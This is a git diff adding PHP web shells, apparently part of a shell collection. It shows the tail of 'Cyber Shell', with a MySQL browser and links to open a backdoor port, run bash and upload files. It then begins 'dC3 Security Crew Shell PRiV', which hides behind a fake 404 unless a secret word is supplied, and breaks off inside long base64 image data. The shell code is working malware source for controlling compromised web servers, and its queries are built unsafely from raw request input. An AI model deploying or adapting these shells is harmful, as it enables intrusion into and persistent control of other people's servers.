+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+mysql_query("delete from $mtable where $pixidname='$pixid'");
+echo "<head><meta http-equiv=\"refresh\" content=\"0;URL=$PHP_SELF?dbname=$dbname&table=$mtable&db_server=$db_server&db_user=$db_user&db_pass=$db_pass\"></head>";
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid)) and (isset($textofmysql))){
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+mysql_query("update $mtable set $var='$textofmysql' where $pixidname=$pixid");
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid))){
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+$re=mysql_query("select $var from $mtable where $pixidname='$pixid'");
+$res=mysql_fetch_array($re);
+$text=untag($res[$var]);
+
+echo "
+<form  action=\"$PHP_SELF\" method=\"POST\">
+<textarea name=\"textofmysql\" rows=\"25\" cols=\"60\" wrap=\"OFF\">$text</textarea>
+<input type=\"hidden\" name=\"dbname\" value=\"$dbname\" >
+<input type=\"hidden\" name=\"mtable\" value=\"$mtable\" >
+<input type=\"hidden\" name=\"var\" value=\"$var\" >
+<input type=\"hidden\" name=\"pixidname\" value=\"$pixidname\" >
+<input type=\"hidden\" name=\"pixid\" value=\"$pixid\" >
+<input type=\"hidden\" name=\"db_server\" value=\"$db_server\" >
+<input type=\"hidden\" name=\"db_user\" value=\"$db_user\" >
+<input type=\"hidden\" name=\"db_pass\" value=\"$db_pass\" >
+<br><input type=\"submit\"  value=\"            Èçìåíèòü            \" >
+</form>
+<a href=$PHP_SELF?dbname=$dbname&table=$mtable&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>Âåğíóòüñÿ ê ñïèñêó</a>
+";
+}
+
+if (isset($showdb) && empty($showtables)){
+$re=mysql_query("show databases");
+echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
+echo "<tr><td><center><div style='background-color:#CCCCFF'><span class='style5'>Ñïèñîê äîñòóïíûõ ÁÄ:</span></div></center></td></tr>";
+while($res=mysql_fetch_array($re)){
+echo "<tr><td><center><a href=$PHP_SELF?showtables=$res[0]&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$res[0]</a></center></td></tr>";
+}
+echo "</table>";
+}
+if (isset($showtables) and !empty($showtables)){
+
+if (isset($xlimit)){
+$_SESSION[limit]=$xlimit;
+if (isset($xlenth))
+$_SESSION[lenth]=$xlenth;
+else $_SESSION[lenth]="";
+}
+
+echo "<a href=$PHP_SELF?showdb&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>Íàçàä ê ñïèñêó ÁÄ</a>";
+$re=mysql_query("SHOW TABLES FROM $showtables");
+echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
+echo "<tr><td><center><div style='background-color:#CCCCFF'><span class='style5'>$showtables - Ñïèñîê òàáëèö: </span></div></center></td></tr>";
+while($res=mysql_fetch_array($re)){
+echo "<tr><td><center><a href=$PHP_SELF?dbname=$showtables&table=$res[0]&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$res[0]</a></td></tr>";
+}
+echo "</table>";
+
+if (($_SESSION[lenth]) == "on")
+$ch="checked";
+else
+$ch="";
+
+echo <<< EOF
+<form  action="$PHP_SELF" method="get">
+<input type="hidden" name="showtables" value="$showtables" >
+<input type="hidden" name="db_server" value="$db_server" >
+<input type="hidden" name="db_user" value="$db_user" >
+<input type="hidden" name="db_pass" value="$db_pass" >
+îãğàíè÷åíèå íà êîëè÷åñòâî âûâîäèìûõ ïîëåé:<br>
+<select name="xlimit">
+  <option value="0">&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1074;&#1089;&#1105;</option>
+  <option value="10">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 10</option>
+  <option value="20">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 20</option>
+  <option value="30">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 30</option>
+  <option value="50">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 50</option>
+  <option value="100">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 100</option>
+  <option value="200">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 200</option>
+  <option value="500">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 500</option>
+  <option value="1000">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 1000</option>
+  <option value="5000">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 5000</option>
+</select>
+<br>Âêëş÷èòü îãğàíè÷åíèå íà äëèíó âûâîäèìûõ ïîëåé <input name="xlenth" type="checkbox" value="on" $ch><br>
+<input type="submit"  value="Ïğèìåíèòü" >
+EOF;
+if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
+echo "<br>Òåêóùåå îãğàíè÷åíèå: $_SESSION[limit]";
+}
+
+if (isset($tools) or isset($tmysql))
+echo "
+<center>
+<table width='505' border='0' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCCC'>
+<tr height='10'>
+<td align='center' bordercolor='#ECE9D8' bgcolor='#FFF8FF'>
+.: MySQL :.
+</td>
+</tr height='10'>
+<tr>
+<td align='center' bordercolor='#ECE9D8' bgcolor='#FFFFFF'>
+<form name='zapros' method='get' action=''>
+<table width='505' border='0' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>
+<tr align='center' >
+<td>
+Host
+</td>
+<td>
+<input name='db_server' type='text' value='localhost'>
+</td>
+</tr>
+<tr align='center' >
+<td>
+Login MySQL
+</td> 
+<td>
+<input type='text' name='db_user' value=''> 
+</tr>
+<tr align='center' >
+<td>
+Password MySQL
+</td> 
+<td>
+<input type='text' name='db_pass' value=''>
+<input type='hidden' name='showdb'>
+</td> 
+</tr>
+<tr align='center' >
+<td>
+Èìÿ ÁÄ (íå îáÿçàòåëüíî)
+</td> 
+<td>
+<input type='text' name='showtables' value=''>
+</td> 
+</tr>
+<tr align='center' >
+<td>
+<input type='submit'>
+</td>
+<td>
+<input type='reset'>
+</td>
+</tr>
+</table>
+</form>
+</td>
+</tr>
+</table>
+</center>
+";
+}
+echo <<< EOF
+<center>.:Cyber Shell (v 1.0):.<br>Copyright © <a href="http://www.cyberlords.net" target="_blank">Cyber Lords Community</a>, 2002-2006</center>
+</td>
+</tr>
+</table>
+EOF;
+
+$d=tourl($d);
+echo "
+<center>
+<span class='style1'>
+<a href=$PHP_SELF?d=$d&diz&tmkdir>.: Ñîçäàòü ïàïêó :.</a>
+<a href=$PHP_SELF?d=$d&diz&tmkfile>.: Ñîçäàòü ôàéë :.</a>
+<a href=$PHP_SELF?d=$d&diz&tbackdoor>.: Îòêğûòü ïîğò äëÿ ïîäêëş÷åíèÿ :.</a><br>
+<a href=$PHP_SELF?d=$d&diz&tbash>.: Bash :.</a>
+<a href=$PHP_SELF?d=$d&diz&tupload>.: Çàêà÷àòü ôàéë :.</a>
+</span>
+</center>
+";
+}
+die;
+?>
diff --git a/php/dC3 Security Crew Shell PRiV.php b/php/dC3 Security Crew Shell PRiV.php
new file mode 100644
index 0000000..e99383d
--- /dev/null
+++ b/php/dC3 Security Crew Shell PRiV.php	
@@ -0,0 +1,1273 @@
+<?PHP
+/* 
+ver=5
+----------------------Only For Priv8 Use---------------------------------
+               I dont support illegal actions!
+-------------------------------------------------------------------------
+          dC3 Security Crew
+-------------------------------------------------------------------------
+By turning "on" safe you can make your shell in 404 Not Find mode if the user doesnt know your OWN set word!
+-------------------------------------------------------------------------
+Shell written by Bl0od3r
+-------------------------------------------------------------------------
+Easy file managing with a lot of features!
+-------------------------------------------------------------------------
+In work:
+special file options
+-------------------------------------------------------------------------
+*/
+//important
+error_reporting(5);
+@ignore_user_abort(true);
+//
+
+$safe="off";
+$word="secret";
+if ($safe=="on") {
+if (!isset($_GET[$word])) {
+   header('HTTP/1.0 404 Not Found');
+   exit;
+   }
+ }
+$made_by="Bl0od3r";
+$of="Netplayazz";
+($made_by=="Bl0od3r") ? $fake=0 : $fake=1;
+($of=="dc3") ? $fake=0 :  $fake=1;
+$st_dir=".";
+$p=str_replace("\\","/",realpath($_GET['file']));
+$j_d=$_GET['file'];
+$j_f=$_GET['file'];
+$filename = $_GET['file'];
+$file_info = pathinfo($filename);
+$extn = $file_info['extension'];
+
+
+if (isset($_GET['dir'])) {
+ $images = array(
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"dir"=>"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAAkFBMVEX////MmTT/zGezgRvLmDN/
+f3/AjSi6hyK9iiWgbghra2vCjyr/5oGufBbHlC+jcQuwfhiIiIjJljGcagS1gh24hSCebAaZZwGa
+aAK0gRzvvFfcqUT4xWC8iSRKSkqreRPCwsK/jCeodhDms06lcw23hB/ToDv/1G//4HvFki3/64X/
+95Fqamr//////5n/9I54UBIWAAAAAXRSTlMAQObYZgAAAAFiS0dELc3aQT0AAAAWdEVYdFNvZnR3
+YXJlAGdpZjJwbmcgMi40LjakM4MXAAAAiUlEQVR42oXOxxKCMBgE4CWhVwEp9i4Ekt/3fzuDE0Yd
+D3633dnDAr8su0i/stKi40cmTfnebckXU2GPj8k0U0mui2KIxYu7q1acA2kv1CxWWQ7RWTTbUhAi
+YjaNxppqCZcJGowLlRI+O1FvbKiV8FhFnXGnJgT0n+RwvmZBXbbN3tFPHPnm4L8nl3EWVP90I8IA
+AAAASUVORK5CYII=",
+"o.b" => "/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAAUAAA/+IMWElDQ19QUk9GSUxFAAEB
+AAAMSExpbm8CEAAAbW50clJHQiBYWVogB84AAgAJAAYAMQAAYWNzcE1TRlQAAAAASUVDIHNSR0IA
+AAAAAAAAAAAAAAEAAPbWAAEAAAAA0y1IUCAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAARY3BydAAAAVAAAAAzZGVzYwAAAYQAAABsd3RwdAAAAfAAAAAUYmtw
+dAAAAgQAAAAUclhZWgAAAhgAAAAUZ1hZWgAAAiwAAAAUYlhZWgAAAkAAAAAUZG1uZAAAAlQAAABw
+ZG1kZAAAAsQAAACIdnVlZAAAA0wAAACGdmlldwAAA9QAAAAkbHVtaQAAA/gAAAAUbWVhcwAABAwA
+AAAkdGVjaAAABDAAAAAMclRSQwAABDwAAAgMZ1RSQwAABDwAAAgMYlRSQwAABDwAAAgMdGV4dAAA
+AABDb3B5cmlnaHQgKGMpIDE5OTggSGV3bGV0dC1QYWNrYXJkIENvbXBhbnkAAGRlc2MAAAAAAAAA
+EnNSR0IgSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAASc1JHQiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFhZWiAAAAAAAADzUQABAAAA
+ARbMWFlaIAAAAAAAAAAAAAAAAAAAAABYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAA
+t4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9kZXNjAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMu
+Y2gAAAAAAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMuY2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZGVzYwAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0
+IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0
+IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRlc2MAAAAAAAAA
+LFJlZmVyZW5jZSBWaWV3aW5nIENvbmRpdGlvbiBpbiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAACxS
+ZWZlcmVuY2UgVmlld2luZyBDb25kaXRpb24gaW4gSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAB2aWV3AAAAAAATpP4AFF8uABDPFAAD7cwABBMLAANcngAAAAFYWVogAAAAAABM
+CVYAUAAAAFcf521lYXMAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAKPAAAAAnNpZyAAAAAAQ1JU
+IGN1cnYAAAAAAAAEAAAAAAUACgAPABQAGQAeACMAKAAtADIANwA7AEAARQBKAE8AVABZAF4AYwBo
+AG0AcgB3AHwAgQCGAIsAkACVAJoAnwCkAKkArgCyALcAvADBAMYAywDQANUA2wDgAOUA6wDwAPYA
++wEBAQcBDQETARkBHwElASsBMgE4AT4BRQFMAVIBWQFgAWcBbgF1AXwBgwGLAZIBmgGhAakBsQG5
+AcEByQHRAdkB4QHpAfIB+gIDAgwCFAIdAiYCLwI4AkECSwJUAl0CZwJxAnoChAKOApgCogKsArYC
+wQLLAtUC4ALrAvUDAAMLAxYDIQMtAzgDQwNPA1oDZgNyA34DigOWA6IDrgO6A8cD0wPgA+wD+QQG
+BBMEIAQtBDsESARVBGMEcQR+BIwEmgSoBLYExATTBOEE8AT+BQ0FHAUrBToFSQVYBWcFdwWGBZYF
+pgW1BcUF1QXlBfYGBgYWBicGNwZIBlkGagZ7BowGnQavBsAG0QbjBvUHBwcZBysHPQdPB2EHdAeG
+B5kHrAe/B9IH5Qf4CAsIHwgyCEYIWghuCIIIlgiqCL4I0gjnCPsJEAklCToJTwlkCXkJjwmkCboJ
+zwnlCfsKEQonCj0KVApqCoEKmAquCsUK3ArzCwsLIgs5C1ELaQuAC5gLsAvIC+EL+QwSDCoMQwxc
+DHUMjgynDMAM2QzzDQ0NJg1ADVoNdA2ODakNww3eDfgOEw4uDkkOZA5/DpsOtg7SDu4PCQ8lD0EP
+Xg96D5YPsw/PD+wQCRAmEEMQYRB+EJsQuRDXEPURExExEU8RbRGMEaoRyRHoEgcSJhJFEmQShBKj
+EsMS4xMDEyMTQxNjE4MTpBPFE+UUBhQnFEkUahSLFK0UzhTwFRIVNBVWFXgVmxW9FeAWAxYmFkkW
+bBaPFrIW1hb6Fx0XQRdlF4kXrhfSF/cYGxhAGGUYihivGNUY+hkgGUUZaxmRGbcZ3RoEGioaURp3
+Gp4axRrsGxQbOxtjG4obshvaHAIcKhxSHHscoxzMHPUdHh1HHXAdmR3DHeweFh5AHmoelB6+Hukf
+Ex8+H2kflB+/H+ogFSBBIGwgmCDEIPAhHCFIIXUhoSHOIfsiJyJVIoIiryLdIwojOCNmI5QjwiPw
+JB8kTSR8JKsk2iUJJTglaCWXJccl9yYnJlcmhya3JugnGCdJJ3onqyfcKA0oPyhxKKIo1CkGKTgp
+aymdKdAqAio1KmgqmyrPKwIrNitpK50r0SwFLDksbiyiLNctDC1BLXYtqy3hLhYuTC6CLrcu7i8k
+L1ovkS/HL/4wNTBsMKQw2zESMUoxgjG6MfIyKjJjMpsy1DMNM0YzfzO4M/E0KzRlNJ402DUTNU01
+hzXCNf02NzZyNq426TckN2A3nDfXOBQ4UDiMOMg5BTlCOX85vDn5OjY6dDqyOu87LTtrO6o76Dwn
+PGU8pDzjPSI9YT2hPeA+ID5gPqA+4D8hP2E/oj/iQCNAZECmQOdBKUFqQaxB7kIwQnJCtUL3QzpD
+fUPARANER0SKRM5FEkVVRZpF3kYiRmdGq0bwRzVHe0fASAVIS0iRSNdJHUljSalJ8Eo3Sn1KxEsM
+S1NLmkviTCpMcky6TQJNSk2TTdxOJU5uTrdPAE9JT5NP3VAnUHFQu1EGUVBRm1HmUjFSfFLHUxNT
+X1OqU/ZUQlSPVNtVKFV1VcJWD1ZcVqlW91dEV5JX4FgvWH1Yy1kaWWlZuFoHWlZaplr1W0VblVvl
+XDVchlzWXSddeF3JXhpebF69Xw9fYV+zYAVgV2CqYPxhT2GiYfViSWKcYvBjQ2OXY+tkQGSUZOll
+PWWSZedmPWaSZuhnPWeTZ+loP2iWaOxpQ2maafFqSGqfavdrT2una/9sV2yvbQhtYG25bhJua27E
+bx5veG/RcCtwhnDgcTpxlXHwcktypnMBc11zuHQUdHB0zHUodYV14XY+dpt2+HdWd7N4EXhueMx5
+KnmJeed6RnqlewR7Y3vCfCF8gXzhfUF9oX4BfmJ+wn8jf4R/5YBHgKiBCoFrgc2CMIKSgvSDV4O6
+hB2EgITjhUeFq4YOhnKG14c7h5+IBIhpiM6JM4mZif6KZIrKizCLlov8jGOMyo0xjZiN/45mjs6P
+No+ekAaQbpDWkT+RqJIRknqS45NNk7aUIJSKlPSVX5XJljSWn5cKl3WX4JhMmLiZJJmQmfyaaJrV
+m0Kbr5wcnImc951kndKeQJ6unx2fi5/6oGmg2KFHobaiJqKWowajdqPmpFakx6U4pammGqaLpv2n
+bqfgqFKoxKk3qamqHKqPqwKrdavprFys0K1ErbiuLa6hrxavi7AAsHWw6rFgsdayS7LCszizrrQl
+tJy1E7WKtgG2ebbwt2i34LhZuNG5SrnCuju6tbsuu6e8IbybvRW9j74KvoS+/796v/XAcMDswWfB
+48JfwtvDWMPUxFHEzsVLxcjGRsbDx0HHv8g9yLzJOsm5yjjKt8s2y7bMNcy1zTXNtc42zrbPN8+4
+0DnQutE80b7SP9LB00TTxtRJ1MvVTtXR1lXW2Ndc1+DYZNjo2WzZ8dp22vvbgNwF3IrdEN2W3hze
+ot8p36/gNuC94UThzOJT4tvjY+Pr5HPk/OWE5g3mlucf56noMui86Ubp0Opb6uXrcOv77IbtEe2c
+7ijutO9A78zwWPDl8XLx//KM8xnzp/Q09ML1UPXe9m32+/eK+Bn4qPk4+cf6V/rn+3f8B/yY/Sn9
+uv5L/tz/bf///+4AJkFkb2JlAGTAAAAAAQMAFQQDBgoNAAARtgAAF0YAABuaAAAgJv/bAIQAAgIC
+AgICAgICAgMCAgIDBAMCAgMEBQQEBAQEBQYFBQUFBQUGBgcHCAcHBgkJCgoJCQwMDAwMDAwMDAwM
+DAwMDAEDAwMFBAUJBgYJDQsJCw0PDg4ODg8PDAwMDAwPDwwMDAwMDA8MDAwMDAwMDAwMDAwMDAwM
+DAwMDAwMDAwMDAwM/8IAEQgAHgK8AwERAAIRAQMRAf/EALsAAQACAwEBAAAAAAAAAAAAAAADBQIE
+BgEHAQEAAAAAAAAAAAAAAAAAAAAAEAACAgMBAQADAQEBAAAAAAAAEwQFAiIDARQREhWAIyQRAAAE
+BQIDBwMBBwUAAAAAAAABAgMx0ZMENBEhEhMzQVFhkZLS4nGBIuEQQKGxYmMUMkKiIyQSAQAAAAAA
+AAAAAAAAAAAAAIATAAIBAgYDAAIDAQEAAAAAAAERACFRMUFhodHxEHGR8IFQgMGxMP/aAAwDAQAC
+EQMRAAAB+DlmAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADmDnDbAAAAAAAAANg+hkJr
+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
